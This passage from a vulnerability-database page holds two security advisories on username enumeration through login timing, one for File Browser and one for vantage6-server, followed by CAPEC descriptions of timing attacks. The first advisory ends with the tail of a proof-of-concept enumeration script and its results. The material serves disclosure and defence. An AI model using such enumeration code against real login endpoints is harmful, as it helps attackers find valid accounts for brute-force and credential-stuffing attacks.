threshold, users)\n        \n        print(\"\\n\" + \"=\"*50)\n        print(f\"SUMMARY: {len(valid_users)} valid users found\")\n        if valid_users:\n            for u in valid_users:\n                print(f\"  -\u003e {u}\")\n        print(\"=\"*50)\n        \n    except KeyboardInterrupt:\n        print(\"\\n[!] Attack cancelled\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\nFor example, in this case, I have guchihacker as the only valid user in the application.\n\u003cimg width=\"842\" height=\"310\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b3caf11e-279c-4532-aa96-fd20cda153a3\" /\u003e\n\nI am going to use the exploit to list valid users.\n\u003cimg width=\"628\" height=\"716\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f9d93e8e-e773-42a5-8a06-bc6bcc2a71fa\" /\u003e\nAs we can see, the user guchihacker has been confirmed as a valid user by comparing the server response time.\n\n### Impact\nAn unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the security posture by facilitating targeted brute-force attacks or credential stuffing against specific, known-valid accounts (e.g., \u0027admin\u0027, \u0027root\u0027, employee names).\n\n\nI remain at your disposal for any questions you may have on this matter. Thank you very much.\n\nSincerely, [Felix Sanchez (GUCHI)](https://guchihacker.github.io/)",
  "id": "GHSA-43mm-m3h2-3prc",
  "modified": "2026-01-21T01:02:17Z",
  "published": "2026-01-21T01:02:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23849"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "File Browser Vulnerable to Username Enumeration via Timing Attack in /api/login"
}

GHSA-45GQ-Q4XH-CP53

Vulnerability from github – Published: 2024-01-30 20:56 – Updated: 2024-02-08 22:48
VLAI
Summary
vantage6 vulnerable to username timing attack
Details

Impact

It is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks

Workarounds

No

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vantage6-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21671"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-30T20:56:48Z",
    "nvd_published_at": "2024-01-30T16:15:48Z",
    "severity": "LOW"
  },
  "details": "### Impact\nIt is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks\n\n### Workarounds\nNo\n",
  "id": "GHSA-45gq-q4xh-cp53",
  "modified": "2024-02-08T22:48:56Z",
  "published": "2024-01-30T20:56:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21671"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/vantage6/PYSEC-2024-31.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vantage6/vantage6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vantage6 vulnerable to username timing attack"
}

No mitigation information available for this CWE.

CAPEC-462: Cross-Domain Search Timing

An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.

CAPEC-541: Application Fingerprinting

An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.

CAPEC-580: System Footprinting

An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.